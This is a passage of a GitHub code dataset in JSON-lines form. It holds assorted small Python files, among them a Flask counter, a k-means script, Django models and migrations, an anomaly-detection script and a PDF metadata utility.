1:\n print(\"Error: file ends on odd number of bytes\" ,file=sys.stderr)\n sys.exit(1)\n\n else:\n print(\"????\", file=sys.stderr)\n sys.exit(1)\n\n\nprint(\"int16_t starting_code[] = {\")\n\nints_per_line = 16\noffset = 0\n\nwhile len(nums) - offset > 0:\n line_str = \"/* 0x{:04x}: */\".format(offset)\n\n line_data = nums[offset:offset+ints_per_line]\n line_str += \" \" + \",\".join(line_data)\n offset += len(line_data)\n\n if(len(nums) - offset > 0):\n line_str = line_str + \",\"\n\n\n print(line_str)\n\n\nprint(\"};\")\nprint(\"const uint16_t starting_code_length = 0x{:x};\".format(offset))\n","repo_name":"jvorob/subleq-bootstrap","sub_path":"tools/bin_to_header.py","file_name":"bin_to_header.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14645860360","text":"from flask import Flask, render_template, request, redirect, session\n\napp = Flask(__name__)\napp.secret_key = 'keep it secret, keep it safe'\n\n@app.route('/')\ndef index():\n if \"count\" not in session:\n session[\"count\"] = 1\n else:\n session[\"count\"] +=1\n return render_template(\"index.html\")\n\n@app.route('/count', methods = [\"POST\"])\ndef one_count():\n if request.form[\"change\"]==\"add\": #this will add to the counter as the add button is clicked\n session[\"count\"]+=1\n elif request.form[\"change\"]==\"reset\":\n session[\"count\"]=0 #this will reset the counter to 1 when the reset button is clicked\n return redirect(\"/\") #cannot put render_template under POST\n\n@app.route('/destroy')\ndef destroy():\n session.clear() #this will clear previous count\n return redirect(\"/\")\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"PamMaw23/Python-Counter","sub_path":"counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19970629283","text":"from scipy.spatial import distance\nfrom sklearn.cluster import KMeans\nfrom os import system\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom visualizations import show_clusters_centroids\n\ndef distancia(lista1,lista2):\n #import pdb; pdb.set_trace()\n dist = distance.euclidean(lista1, lista2)\n return dist\n\ndef centros(lista):\n # Create an empty list for the new centers\n centros_list = []\n\n # Convert the list into a numpy array\n listasnonpy = np.array(lista, dtype=object)\n\n for i in listasnonpy:\n centros_list.append(np.mean(i, axis = 0))\n return centros_list\n\ndef cercanos(puntos,centros):\n lista=[[]for x in centros]\n #import pdb; pdb.set_trace()\n for i, punto in enumerate(puntos):\n dist=[]\n for j, centro in enumerate(centros):\n dist.append(distancia(punto,centro))\n small=np.argmin(dist)\n lista[small].append(punto)\n return lista\n\ndef k_means(puntos):\n cantidad_de_centros = 0\n points = np.array(puntos)\n\n cantidad_de_centros = int(input(\"Elija la cantidad de centros: \"))\n system('clear')\n iterationts = int(input(\"Elija la cantidad de iteraciones: \"))\n\n idx = np.random.randint(len(points),size=cantidad_de_centros)\n k_lista = points[idx,:]\n clusters = cercanos(points, k_lista)\n\n # Redifine puntos and centers adjusting with the methods cercanos() and centros()\n for i in range(iterationts):\n if i % 1 == 0:\n if i == 0:\n title = \"Initialization\"\n else:\n title = \"Iteration {}\".format(i+1)\n\n show_clusters_centroids(clusters, k_lista, title)\n clusters = cercanos(points, k_lista)\n k_lista = centros(clusters)\n\n # Return the new adjustes list\n return clusters, k_lista\n\ndef generarPuntos(i, j):\n puntos = []\n for cony in range(i):\n lista=[]\n for conx in range(j):\n lista.append(random.randint(0, 5000))\n puntos.append(lista)\n return puntos\n\n# def generarPuntos(i):\n# lista = []\n# for con in range(i):\n# lista.append(random.randint(0, 100))\n# return np.array(lista)\n\n\nif __name__ == '__main__':\n system('clear')\n system('clear')\n puntos = generarPuntos(200, 8)\n # print(\"Antes: \")\n # print(puntos)\n cluster=k_means(puntos)\n print(\"Despues: \")\n print(cluster)\n","repo_name":"brilubel15/Equipo6","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3485504829","text":"''' 075 Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em um tupla. No final, mostre:\nquantas vezes apareceu o valor 9\nem que posição foi digitado o primeiro valor 3\nquais foram os números pares '''\n\ntupla = (int(input('Digite o primeiro valor: ')),\n int(input('Digite segundo valor: ')),\n int(input('Digite terceiro valor: ')),\n int(input('Digite quarto valor: '))) # forma de criar um tupla, lembrar que a tupla é imutável\n\nprint(tupla)\n\ncontpares = cont9 = 0\n\nfor n in tupla:\n print(n)\n if n == 9:\n cont9 += 1\n if n % 2 == 0:\n contpares += 1\nprint(f'O valor 9 apareceu {cont9} vezes')\nprint(f'O valor 9 foi digitado {tupla.count(9)}') # forama direta de contar dentro da tupla\nif 3 in tupla:\n print(f'O número 3 apareceu na {tupla.index(3) + 1} posição') # retira o erro caso não seja digitado o 3\nelse:\n print('O valor 3 não foi digitado!')\n\nprint(f'Os valores pares digitados foram {contpares}')\n","repo_name":"Carlos-DOliveira/cursoemvideo-python3","sub_path":"pacote-download/d075 - Análise de dados com tupla.py","file_name":"d075 - Análise de dados com tupla.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6587389633","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution(object):\n def isBalanced(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n def _isBalanced(root):\n if root:\n left_depth, left_balance = _isBalanced(root.left)\n right_depth, right_balance = _isBalanced(root.right)\n bal_res = left_balance and right_balance and abs(left_depth-right_depth) <= 1\n depth = max(left_depth, right_depth)\n return depth+1, bal_res\n else:\n return 0, True\n _, res = _isBalanced(root)\n return res\n\n\"\"\"\ncheck the depth of none\n\"\"\"\n","repo_name":"wangyunge/algorithmpractice","sub_path":"cn/110.py","file_name":"110.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24198690510","text":"import datetime\n\nfrom sqlalchemy import delete as sqlalchemy_delete, desc, or_\nfrom sqlalchemy import update as sqlalchemy_update\nfrom sqlalchemy.future import select\nfrom db import Base, db\n\ndb.init()\n\n\nclass AbstractClass:\n @staticmethod\n async def commit():\n try:\n await db.commit()\n except Exception:\n await db.rollback()\n raise\n\n @classmethod\n async def create(cls, **kwargs):\n object_ = cls(**kwargs)\n db.add(object_)\n await cls.commit()\n return object_\n\n @classmethod\n async def update(cls, id_, **kwargs):\n query = (\n sqlalchemy_update(cls)\n .where(cls.chat_id == id_)\n .values(**kwargs)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await cls.commit()\n\n @classmethod\n async def update_bird(cls, id_: str, type_: int, **kwargs):\n query = (\n sqlalchemy_update(cls)\n .where(cls.chat_id == id_, cls.type == type_)\n .values(**kwargs)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await cls.commit()\n\n @classmethod\n async def get(cls, id_):\n query = select(cls).where(cls.chat_id == id_)\n objects = await db.execute(query)\n object_ = objects.first()\n return object_\n\n @classmethod\n async def delete(cls, id_):\n query = (\n sqlalchemy_delete(cls)\n .where(cls.chat_id == id_)\n .execution_options(synchronize_session=\"fetch\")\n )\n await db.execute(query)\n await cls.commit()\n\n @classmethod\n async def get_all(cls):\n query = select(cls)\n objects = await db.execute(query)\n return objects.all()\n\n @classmethod\n async def get_top(cls, name: str):\n query = select(cls).order_by(desc(name)).limit(10)\n objects = await db.execute(query)\n return objects.all()\n\n @classmethod\n async def get_birds(cls, id_):\n query = select(cls).where(\n cls.chat_id == id_,\n or_(\n cls.mutation >= datetime.datetime.now(),\n cls.vitamin >= datetime.datetime.now()\n )\n )\n objects = await db.execute(query)\n object_ = objects.all()\n return object_\n\n\nclass CreatedModel(Base, AbstractClass):\n __abstract__ = True\n","repo_name":"projectsmuhammadnur/FarmBot","sub_path":"db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45165586226","text":"import pandas as pd\nimport numpy as np\nimport datetime\nfrom matplotlib import pyplot as plt\nimport glob\nimport os\nimport re\n\nroot = os.getcwd() #get the current working directory\n\nif os.path.exists('summary_H2S.csv'): # check if the summary csv already exists\n print ('The program will not proceed if the summary_H2S csv file already exists') # check if the summary csv already exists\nelse:\n file_dir = glob.glob(root+'\\\\*.csv')\n summary_H2S= []\n for file_name in file_dir:\n table =[]\n Site_ID = os.path.basename(file_name).split('.')[0]\n\n with open(file_name,'r') as f:\n lines = f.readlines()\n for n in range(len(lines)):\n if 'Date' in lines[n] or 'Time Stamp' in lines[n]:\n table_header =n\n if 'EVENTS' in lines[n]:\n table_end = n\n lines[n] = lines[n].split(',')\n\n table =lines[table_header+1:table_end]\n columns = lines[table_header]\n\n # Replace the H2S () to H2S (PPM)\n for n, i in enumerate(columns):\n if i == 'H2S ()':\n columns[n] = 'H2S (PPM)'\n if i =='Time Stamp\\n':\n columns[n] = 'Time Stamp'\n\n table_df = pd.DataFrame(table, columns=columns)\n table_df = table_df.replace(r'\\n', '', regex=True)\n table_df['Time Stamp'] = pd.to_datetime(table_df['Time Stamp'])\n table_df['Site_ID'] = Site_ID\n table_df = table_df[['Time Stamp','H2S (PPM)','Site_ID']]\n\n # Considering the PPB scenario and remove the initial and last zeros\n if 'ppb' in Site_ID or 'PPB' in Site_ID:\n table_df['H2S (PPM)'] =table_df['H2S (PPM)'].astype('float64')*0.001\n else:\n none_zero_list =[] # obtain the list of the entries that are not zero\n for i in range(len(table_df)):\n if table_df['H2S (PPM)'][i] != '0':\n none_zero_list.append(i)\n none_zero_st = min(none_zero_list) # the first none zero\n none_zero_ed = max(none_zero_list) # the last none zero\n table_df = table_df[none_zero_st:none_zero_ed+1] # eleminating the first and last zeros in the dataframe\n\n pattern = r'\\{.+\\}'\n table_df['Site_ID'] = re.sub(pattern, '', Site_ID)\n table_df['Site_ID'] = table_df['Site_ID'].str.strip()\n\n summary_H2S.append(table_df) #combine all sites'data into a dataframe\n\n\n summary_H2S = pd.concat(summary_H2S, axis=0).reset_index().drop(columns=['index'])\n summary_H2S = summary_H2S.sort_values(['Site_ID','Time Stamp'], ascending=[True, True])\n summary_H2S.to_csv(root + '\\\\summary_H2S.csv', index=False)\n\n\n\n\n\n","repo_name":"xphn/19-0327-demo","sub_path":"H2S_data.py","file_name":"H2S_data.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26743686061","text":"# -------------------------------------------------------------------\n# Módulo entParametros.py\n# Clase para manejar información de Parámetros del Sistema\n# -------------------------------------------------------------------\n\n# Definición de la Clase\nclass eParametros:\n\n # Constructor\n def __init__(self):\n\n # Propiedades correspondientes a las Columnas de la Tabla\n self.__intMensajesExito = -1\n self.__intAgruparProductos = -1\n self.__intVerificarExistencias = -1\n self.__intImprimirTicket = -1\n self.__intBitacoraActiva = -1\n self.__strMensajeTicket = \"\"\n self.__strMonedaSimbolo = \"\"\n self.__strMonedaNombre = \"\"\n\n \n # Setter's y Getter's\n def setIntMensajesExito(self,mensajeExito):\n if (mensajeExito<0 or mensajeExito>1):\n print(\"Error al asignar el Mensaje de Exito:\",mensajeExito, \"; valores posibles:0,1\")\n else: \n self.__intMensajesExito = mensajeExito\n\n def getIntMensajesExito(self):\n return self.__intMensajesExito\n\n def setIntAgruparProductos(self,agruparProductos):\n if (agruparProductos<0 or agruparProductos>1):\n print(\"Error al asignar Agrupar Productos:\",agruparProductos, \"; valores posibles:0,1\")\n else: \n self.__intAgruparProductos = agruparProductos\n\n def getIntAgruparProductos(self):\n return self.__intAgruparProductos\n\n def setIntVerificarExistencias(self,verificarExistencias):\n if (verificarExistencias<0 or verificarExistencias>1):\n print(\"Error al asignar Verificar Existencias:\",verificarExistencias, \"; valores posibles:0,1\")\n else: \n self.__intVerificarExistencias = verificarExistencias\n\n def getIntVerificarExistencias(self):\n return self.__intVerificarExistencias\n\n def setIntImprimirTicket(self,imprimirTicket):\n if (imprimirTicket<0 or imprimirTicket>1):\n print(\"Error al asignar Imprimir Ticket:\",imprimirTicket, \"; valores posibles:0,1\")\n else: \n self.__intImprimirTicket = imprimirTicket\n\n def getIntImprimirTicket(self):\n return self.__intImprimirTicket\n\n def setIntBitacoraActiva(self,bitacoraActiva):\n if (bitacoraActiva<0 or bitacoraActiva>1):\n print(\"Error al asignar Bitácora Activa:\",bitacoraActiva, \"; valores posibles:0,1\")\n else:\n self.__intBitacoraActiva = bitacoraActiva\n\n def getIntBitacoraActiva(self):\n return self.__intBitacoraActiva\n\n def setStrMensajeTicket(self,mensajeTicket):\n if (len(mensajeTicket) > 40):\n print(\"Error al asignar Mensaje Ticket:\",mensajeTicket, \"; longitud máxima 40 caracteres\")\n else:\n self.__strMensajeTicket = mensajeTicket\n\n def getStrMensajeTicket(self):\n return self.__strMensajeTicket\n\n def setStrMonedaSimbolo(self,monedaSimbolo):\n if (len(monedaSimbolo) > 1):\n print(\"Error al asignar Moneda Símbolo:\",monedaSimbolo, \"; longitud máxima 1 caracteres\")\n else:\n self.__strMonedaSimbolo = monedaSimbolo\n\n def getStrMonedaSimbolo(self):\n return self.__strMonedaSimbolo\n\n def setStrMonedaNombre(self,monedaNombre):\n if (len(monedaNombre) > 10):\n print(\"Error al asignar Moneda Nombre:\",monedaNombre, \"; longitud máxima 10 caracteres\")\n else:\n self.__strMonedaNombre = monedaNombre\n\n def getStrMonedaNombre(self):\n return self.__strMonedaNombre\n \n# Función main\nif __name__ == \"__main__\":\n\n # Cargo la libreria\n from PyQt5 import QtWidgets\n\n # Importa la librería sys\n import sys\n\n # Crea el objeto de Aplicación\n app = QtWidgets.QApplication(sys.argv)\n\n # Crea un objeto de la Clase\n oParametros = eParametros()\n\n # Le coloca datos al objeto; setter's\n oParametros.setIntAgruparProductos(1)\n oParametros.setIntBitacoraActiva(1)\n oParametros.setIntImprimirTicket(1)\n oParametros.setIntMensajesExito(1)\n oParametros.setIntVerificarExistencias(1)\n oParametros.setStrMensajeTicket(\"! Felices Fiestas !\")\n oParametros.setStrMonedaNombre(\"Pesos M.N.\")\n oParametros.setStrMonedaSimbolo(\"$\")\n \n\n # Desplegando la información; getter's\n print(\"Agrupar Productos :\",\"Sí\" if (oParametros.getIntAgruparProductos()==1) else \"No\")\n print(\"Bitacora Activa :\",\"Sí\" if (oParametros.getIntBitacoraActiva()==1) else \"No\")\n print(\"Imprimir Ticket :\",\"Sí\" if (oParametros.getIntImprimirTicket()==1) else \"No\")\n print(\"Mensajes Éxito :\",\"Sí\" if (oParametros.getIntMensajesExito()==1) else \"No\")\n print(\"Verificar Existencias :\",\"Sí\" if (oParametros.getIntVerificarExistencias()==1) else \"No\")\n print(\"Mensaje Ticket :\",oParametros.getStrMensajeTicket())\n print(\"Moneda Nombre :\",oParametros.getStrMonedaNombre())\n print(\"Moneda Simbolo :\",oParametros.getStrMonedaSimbolo())\n\n ","repo_name":"marcelo-de/Curso","sub_path":"entidades/sistema/entParametros.py","file_name":"entParametros.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23832091934","text":"#!/usr/bin/python3\n\"\"\"0-hbtn_status module\"\"\"\nimport requests\nimport sys\n\n\ndef main(req, data):\n \"\"\"handles http request and print response\"\"\"\n response = requests.post(req, data=data)\n try:\n json_data = response.json()\n if len(json_data) == 0:\n print(\"No result\")\n else:\n print(\"[{}] {}\".format(json_data['id'], json_data['name']))\n except Exception:\n print(\"Not a valid JSON\")\n\n\nif __name__ == \"__main__\":\n # config\n if len(sys.argv) > 1:\n data = {'q': sys.argv[1]}\n else:\n data = {'q': ''}\n url = \"http://0.0.0.0:5000/search_user\"\n # init\n main(url, data)\n","repo_name":"aristizabaru/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/8-json_api.py","file_name":"8-json_api.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28221087793","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport pandas as pd\r\n\r\nstudent_data = pd.read_csv(\"student-alcohol-consumption.csv\")\r\n\r\n# Change to make subplots based on study time\r\nsns.relplot(x=\"absences\", y=\"G3\", \r\n data=student_data,\r\n kind=\"scatter\",\r\n col=\"study_time\"\r\n )\r\n\r\n# Show plot\r\nplt.show()\r\n\r\n#arrange the plots in rows instead of columns\r\nsns.relplot(x=\"absences\", y=\"G3\", \r\n data=student_data,\r\n kind=\"scatter\", \r\n row=\"study_time\")\r\n\r\n# Show plot\r\nplt.show()","repo_name":"beyremweslati/DataScience-with-Python","sub_path":"Introduction to Data Visualization with Seaborn/Chapter2/subplots_with_col_row.py","file_name":"subplots_with_col_row.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"20005599208","text":"import os, sys\nimport xmltodict\n\nproj_path = \"/Users/crawforb/Projects/Development/PyCharmProjects/BCC/\"\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'BCC.settings')\nsys.path.append(proj_path)\nos.chdir(proj_path)\n\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\nimport refdata.models\n\nwith open('refdata/data-import/languages.xml') as fd:\n doc = xmltodict.parse(fd.read())\n\n for language in doc['DataExchange']['root']['Language']:\n new_lang = refdata.models.Language()\n new_lang.ebxid = language['base'].get('id', None)\n new_lang.name = language['base'].get('name', None)\n new_lang.code2 = language.get('code2', None)\n new_lang.code3 = language.get('code3', None)\n new_lang.save()\n","repo_name":"blakecrawford/BCC","sub_path":"BCC/refdata/data-import/import-languages.py","file_name":"import-languages.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43182639279","text":"import urllib.request\n\ndef read_text():\n quotes = open(\"/Users/yp/study/udacity/udacity_PFwithPy/check_profanity/movie_quotes.txt\")\n contents_of_file = quotes.read()\n # print(contents_of_file)\n check_profanity(contents_of_file)\n quotes.close()\n\ndef check_profanity(text_to_check):\n url = \"http://www.wdylike.appspot.com/?q=\" + text_to_check\n #url = \"http://www.wdylike.appspot.com/?q=shit\"\n # print(url)\n req = urllib.request.Request(url)\n conn = urllib.request.urlopen(req)\n output = str(conn.read().decode('utf-8').strip())\n # print(output)\n conn.close()\n\n if \"true\" in output:\n print(\"Profanity Alert!!\")\n elif \"false\" in output:\n print(\"this document has no curse word!\")\n else :\n print(\"could not scan the document properly.\")\n\nread_text()","repo_name":"hanlsin/udacity_PFwithPy","sub_path":"check_profanity/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17219781343","text":"from __future__ import unicode_literals\n\nimport uuid\n\nimport django.db.models.deletion\nfrom django.conf import settings\nfrom django.db import migrations, models\n\nimport django_changeset.models.mixins\nimport django_userforeignkey.models.fields\n\nimport eric.core.models.abstract\nimport eric.core.models.base\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('projects', '0092_resource_update_user_availability_choice_text'),\n ('labbooks', '0008_add_description'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='LabbookSection',\n fields=[\n ('created_at', models.DateTimeField(auto_now_add=True, db_index=True, null=True, verbose_name='Date when this element was created')),\n ('last_modified_at', models.DateTimeField(auto_now=True, db_index=True, null=True, verbose_name='Date when this element was last modified')),\n ('version_number', django_changeset.models.mixins.ChangesetVersionField(default=0)),\n ('deleted', models.BooleanField(db_index=True, default=False, verbose_name='Whether this entry is deleted or not')),\n ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),\n ('date', models.DateField(verbose_name='Date of the LabBook section')),\n ('title', models.CharField(max_length=128, verbose_name='Title of the LabBook section')),\n ('child_elements', models.ManyToManyField(blank=True, related_name='labbooksection', to='labbooks.LabBookChildElement', verbose_name='Which LabBookChildElements is this LabBook section associated to')),\n ('created_by', django_userforeignkey.models.fields.UserForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='labbooksection_created', to=settings.AUTH_USER_MODEL, verbose_name='User that created this element')),\n ('last_modified_by', django_userforeignkey.models.fields.UserForeignKey(blank=True, editable=False, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='labbooksection_modified', to=settings.AUTH_USER_MODEL, verbose_name='User that last modified this element')),\n ('projects', models.ManyToManyField(blank=True, to='projects.Project', verbose_name='Which projects is this LabBook section associated to')),\n ],\n options={\n 'verbose_name_plural': 'LabbookSections',\n 'ordering': ['date', 'title'],\n 'verbose_name': 'LabbookSection',\n 'permissions': (('view_labbooksection', 'Can view a LabBook section'), ('trash_labbooksection', 'Can trash a LabBook section'), ('restore_labbooksection', 'Can restore a LabBook section'), ('change_project_labbooksection', 'Can change the project of a LabBook section'), ('add_labbooksection_without_project', 'Can add a LabBook section without a project')),\n },\n bases=(django_changeset.models.mixins.RevisionModelMixin, eric.core.models.base.LockMixin, eric.core.models.abstract.WorkbenchEntityMixin, models.Model),\n ),\n ]\n","repo_name":"eWorkbench/eWorkbench","sub_path":"backend-django/app/eric/labbooks/migrations/0009_add_labbooksection.py","file_name":"0009_add_labbooksection.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"35055100042","text":"#Используя функции и аргументы напишите программу с помощью коструктора#:\n#На вход в программу подаётся число от 250 до 10000. Число обозначает\n#количество патронов.\n#Скорострельность пулемёта 1200 выстрелов в минуту. В одной пулемётной ленте\n#250 патронов. На смену ленты уходит 20 секун��.\n#За сколько секунд пулемётчик расстреляет все патроны, если считать что первая\n#лента уже установлена в пулемёт?\n#Если число на входе не попадает в диапазон, вывести: Введите число от 250 до\n#10000.\n\n\nimport math\n\n\nclass Task2():\n\n def __init__(self, int_inp):\n self.int_inp = int_inp\n res = str((int_inp / 1200) * 60 + ((math.ceil(int_inp / 250) - 1) * 20))\n\n self.output(int_inp, res)\n\n def output(self, int_inp, res):\n self.res = res\n if 250 > self.int_inp or self.int_inp > 10000:\n print('Введите число от 250 до 10000.')\n else:\n print(f'Патроны закончатся через {self.res} секунд')\n\n\nresult = Task2 (int(input('Введите количество патронов: ')))","repo_name":"tarantot/python-for-pentester-tasks","sub_path":"Classes & OOP/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33682842413","text":"import argparse\nimport numpy as np\nimport os\nimport pickle\nfrom tqdm import tqdm\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.metrics import roc_curve\nfrom sklearn.covariance import LedoitWolf\nfrom scipy.spatial.distance import mahalanobis\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom efficientnet_pytorch import EfficientNet\n\nimport datasets.mvtec as mvtec\n\n\ndef parse_args():\n parser = argparse.ArgumentParser('MahalanobisAD')\n parser.add_argument(\"--model_name\", type=str, default='efficientnet-b4')\n parser.add_argument(\"--save_path\", type=str, default=\"./result\")\n return parser.parse_args()\n\n\ndef main():\n\n args = parse_args()\n assert args.model_name.startswith('efficientnet-b'), 'only support efficientnet variants, not %s' % args.model_name\n\n # device setup\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # load model\n model = EfficientNetModified.from_pretrained(args.model_name)\n model.to(device)\n model.eval()\n\n os.makedirs(os.path.join(args.save_path, 'temp'), exist_ok=True)\n\n total_roc_auc = []\n\n for class_name in mvtec.CLASS_NAMES:\n\n train_dataset = mvtec.MVTecDataset(class_name=class_name, is_train=True)\n train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)\n test_dataset = mvtec.MVTecDataset(class_name=class_name, is_train=False)\n test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)\n\n train_outputs = [[] for _ in range(9)]\n test_outputs = [[] for _ in range(9)]\n\n # extract train set features\n train_feat_filepath = os.path.join(args.save_path, 'temp', 'train_%s_%s.pkl' % (class_name, args.model_name))\n if not os.path.exists(train_feat_filepath):\n for (x, y, mask) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):\n # model prediction\n with torch.no_grad():\n feats = model.extract_features(x.to(device))\n for f_idx, feat in enumerate(feats):\n train_outputs[f_idx].append(feat)\n\n # fitting a multivariate gaussian to features extracted from every level of ImageNet pre-trained model\n for t_idx, train_output in enumerate(train_outputs):\n mean = torch.mean(torch.cat(train_output, 0).squeeze(), dim=0).cpu().detach().numpy()\n # covariance estimation by using the Ledoit. Wolf et al. method\n cov = LedoitWolf().fit(torch.cat(train_output, 0).squeeze().cpu().detach().numpy()).covariance_\n train_outputs[t_idx] = [mean, cov]\n\n # save extracted feature\n with open(train_feat_filepath, 'wb') as f:\n pickle.dump(train_outputs, f)\n else:\n print('load train set feature distribution from: %s' % train_feat_filepath)\n with open(train_feat_filepath, 'rb') as f:\n train_outputs = pickle.load(f)\n\n gt_list = []\n\n # extract test set features\n for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):\n gt_list.extend(y.cpu().detach().numpy())\n # model prediction\n with torch.no_grad():\n feats = model.extract_features(x.to(device))\n for f_idx, feat in enumerate(feats):\n test_outputs[f_idx].append(feat)\n for t_idx, test_output in enumerate(test_outputs):\n test_outputs[t_idx] = torch.cat(test_output, 0).squeeze().cpu().detach().numpy()\n\n # calculate Mahalanobis distance per each level of EfficientNet\n dist_list = []\n for t_idx, test_output in enumerate(test_outputs):\n mean = train_outputs[t_idx][0]\n cov_inv = np.linalg.inv(train_outputs[t_idx][1])\n dist = [mahalanobis(sample, mean, cov_inv) for sample in test_output]\n dist_list.append(np.array(dist))\n\n # Anomaly score is followed by unweighted summation of the Mahalanobis distances\n scores = np.sum(np.array(dist_list), axis=0)\n\n # calculate image-level ROC AUC score\n fpr, tpr, _ = roc_curve(gt_list, scores)\n roc_auc = roc_auc_score(gt_list, scores)\n total_roc_auc.append(roc_auc)\n print('%s ROCAUC: %.3f' % (class_name, roc_auc))\n plt.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, roc_auc))\n\n print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))\n plt.title('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))\n plt.legend(loc='lower right')\n plt.savefig(os.path.join(args.save_path, 'roc_curve_%s.png' % args.model_name), dpi=200)\n\n\nclass EfficientNetModified(EfficientNet):\n\n def extract_features(self, inputs):\n \"\"\" Returns list of the feature at each level of the EfficientNet \"\"\"\n\n feat_list = []\n\n # Stem\n x = self._swish(self._bn0(self._conv_stem(inputs)))\n feat_list.append(F.adaptive_avg_pool2d(x, 1))\n\n # Blocks\n x_prev = x\n for idx, block in enumerate(self._blocks):\n drop_connect_rate = self._global_params.drop_connect_rate\n if drop_connect_rate:\n drop_connect_rate *= float(idx) / len(self._blocks)\n x = block(x, drop_connect_rate=drop_connect_rate)\n if (x_prev.shape[1] != x.shape[1] and idx != 0) or idx == (len(self._blocks) - 1):\n feat_list.append(F.adaptive_avg_pool2d(x_prev, 1))\n x_prev = x\n\n # Head\n x = self._swish(self._bn1(self._conv_head(x)))\n feat_list.append(F.adaptive_avg_pool2d(x, 1))\n\n return feat_list\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"byungjae89/MahalanobisAD-pytorch","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"76"} +{"seq_id":"72179039286","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport xml.etree.ElementTree as etree\n\nimport pandas as pd\n\nfrom pdf_analytics import PdfAnalytics\n\n\nclass PdfFolder:\n DC_NS = {'dc': 'http://purl.org/dc/elements/1.1/'}\n\n def __init__(self, folder_path: str):\n self.folder_path = folder_path\n self.analytics = self.__get_pdf_analytics()\n etree.register_namespace('dc', self.DC_NS['dc'])\n\n def pdf_paths(self) -> list[str]:\n return [pdf.filepath for pdf in self.analytics]\n\n def to_file(self, xml_path: str) -> None:\n tree = self.__xml()\n with open(xml_path, 'w') as xml_file:\n tree.write(xml_file, encoding='unicode', xml_declaration=True)\n\n def to_xml(self) -> str:\n tree = self.__xml()\n result = etree.tostring(tree.getroot(), encoding='unicode')\n return result\n\n def dc_dataframe(self) -> pd.DataFrame:\n result = list()\n for pa in self.analytics:\n values = {'filename': pa.filename}\n values.update(self.__get_tag_values(pa))\n result.append(values)\n return pd.DataFrame.from_dict(result)\n\n def stats_dataframe(self) -> pd.DataFrame:\n result = list()\n for pa in self.analytics:\n values = {'filename': pa.filename}\n values['pages'] = pa.page_count()\n values['figures'] = pa.figure_count()\n values['tables'] = pa.table_count()\n values['images'] = pa.image_count()\n result.append(values)\n return pd.DataFrame.from_dict(result)\n\n def __get_pdf_files(self) -> list:\n result = list()\n for file in os.listdir(self.folder_path):\n if file.lower().endswith('.pdf'):\n 